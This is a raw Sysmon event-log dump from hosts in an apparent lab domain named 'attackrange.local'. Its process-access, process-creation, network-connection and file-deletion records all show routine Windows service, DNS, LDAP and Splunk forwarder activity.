21:47:12.993{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105121Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:12.992{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105120Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:12.992{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105119Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:12.992{54715871-FD16-60C9-0500-00000000CF01}408368C:\Windows\system32\csrss.exe{54715871-7160-60CA-3613-00000000CF01}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105118Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:12.992{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7160-60CA-3613-00000000CF01}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105117Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:12.991{54715871-7160-60CA-3613-00000000CF01}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000105116Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:11.071{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55437-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local389ldap 354300x8000000000000000105115Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:11.071{54715871-FD28-60C9-2E00-00000000CF01}3064C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55437-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local389ldap 354300x8000000000000000105114Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:11.062{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55436-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local389ldap 354300x8000000000000000105113Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:11.062{54715871-FD28-60C9-2E00-00000000CF01}3064C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55436-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local389ldap 354300x8000000000000000105112Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:11.046{54715871-FD18-60C9-0D00-00000000CF01}908C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55435-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local135epmap 354300x8000000000000000105111Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:11.046{54715871-FD28-60C9-2E00-00000000CF01}3064C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55435-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local135epmap 354300x8000000000000000105110Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:10.847{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55434-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151768Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:12.928{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B847F600F0EF19D6ADE1109517F66F95,SHA256=9A8F895552F7273148B4D55AAB1E4040421820FFC6DDCE77C183846808391765,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151767Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:12.791{39BD8DE3-0F65-60CA-1200-00000000D101}960NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=01B4C6A3E4496E28F1F452A77F1A6392,SHA256=5C2C97DB1923D424DBEA3C33570E523C81C8A35CECBA51E754587D7300ABE341,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151766Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:12.175{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA02F4C6B3576AF95BED786A53872C1F,SHA256=79418F08045EEAA305229A8C7449D25ACB3BC23E99F6DA8862ADCC45EEF366B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105126Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.673{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57794F2D157209248F868AA8ED09E2D0,SHA256=E2C25F48DDB7E5F237D82013C7C704E2AB8C42DD7C3607E3F1051FE9E310C6DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151770Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:13.930{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6CF3135D0EA5BAF435A5CEF7773559F,SHA256=49A3A62B741F31A99CFFC5B29B92B88B1337CF8F6E34754C9E6A5AC211DE50FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151769Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:10.993{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58417-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151771Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:14.950{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFD215768ACAB62933FA66162153A29C,SHA256=1E4E1CDC14E1AE1A002A0EA5EBDD4FA1D8FA4071E8E47797D7E0B57BCAD5C418,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105165Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.930{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local62540- 354300x8000000000000000105164Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.929{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local62678- 354300x8000000000000000105163Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.927{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local62353- 354300x8000000000000000105162Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.927{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local57420- 354300x8000000000000000105161Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.926{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local56524- 354300x8000000000000000105160Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.925{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local50490- 354300x8000000000000000105159Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.924{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local55252- 354300x8000000000000000105158Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.923{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local49721- 354300x8000000000000000105157Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.922{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local52879- 354300x8000000000000000105156Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.921{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local50224- 354300x8000000000000000105155Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.920{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local51100- 354300x8000000000000000105154Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.919{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local49625- 354300x8000000000000000105153Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.917{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local51762- 354300x8000000000000000105152Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.916{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local57597- 354300x8000000000000000105151Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.912{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local54669- 354300x8000000000000000105150Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.911{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local53942- 354300x8000000000000000105149Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.910{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local63925- 354300x8000000000000000105148Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.909{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local51769- 354300x8000000000000000105147Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.908{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local56235- 354300x8000000000000000105146Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.907{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local49813- 354300x8000000000000000105145Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.906{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local63925- 354300x8000000000000000105144Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.905{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local57286- 354300x8000000000000000105143Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.904{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local62813- 354300x8000000000000000105142Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.903{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local52359- 354300x8000000000000000105141Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.903{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53060- 354300x8000000000000000105140Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.901{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local50719- 354300x8000000000000000105139Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.900{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local56249- 354300x8000000000000000105138Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.899{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local55238- 354300x8000000000000000105137Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.898{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local56750- 354300x8000000000000000105136Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.897{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local55983- 354300x8000000000000000105135Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.897{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local62632- 354300x8000000000000000105134Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.895{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local50978- 354300x8000000000000000105133Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.894{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local62071- 354300x8000000000000000105132Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.894{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local54930- 354300x8000000000000000105131Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.893{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local55813- 354300x8000000000000000105130Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.892{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local62603- 354300x8000000000000000105129Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.891{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local53296- 354300x8000000000000000105128Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.890{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local64274- 23542300x8000000000000000105127Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:15.037{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=609A13CE868A9B7128DF80747C53791E,SHA256=63E335996D5133A3AE1996278157A0EB19A37178E75CF20C5CD15EBA212B4058,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151772Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:15.981{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27FCC5D9097A5037EE6F9647017EC4C8,SHA256=28E71AC5A0A3DE65FC4C8C031DD7B31B37DBB896D182CC9A9AEF124B5E079980,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105167Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:13.930{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local56794- 23542300x8000000000000000105166Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:16.421{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C3F454BA235A08A5E1A922C1CE42C3C,SHA256=88AFACB7D5B0B350EBC9DAD0FA7A00B7C843D9DDCAAA32D6A24E1AFDCF913601,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151773Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:16.982{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 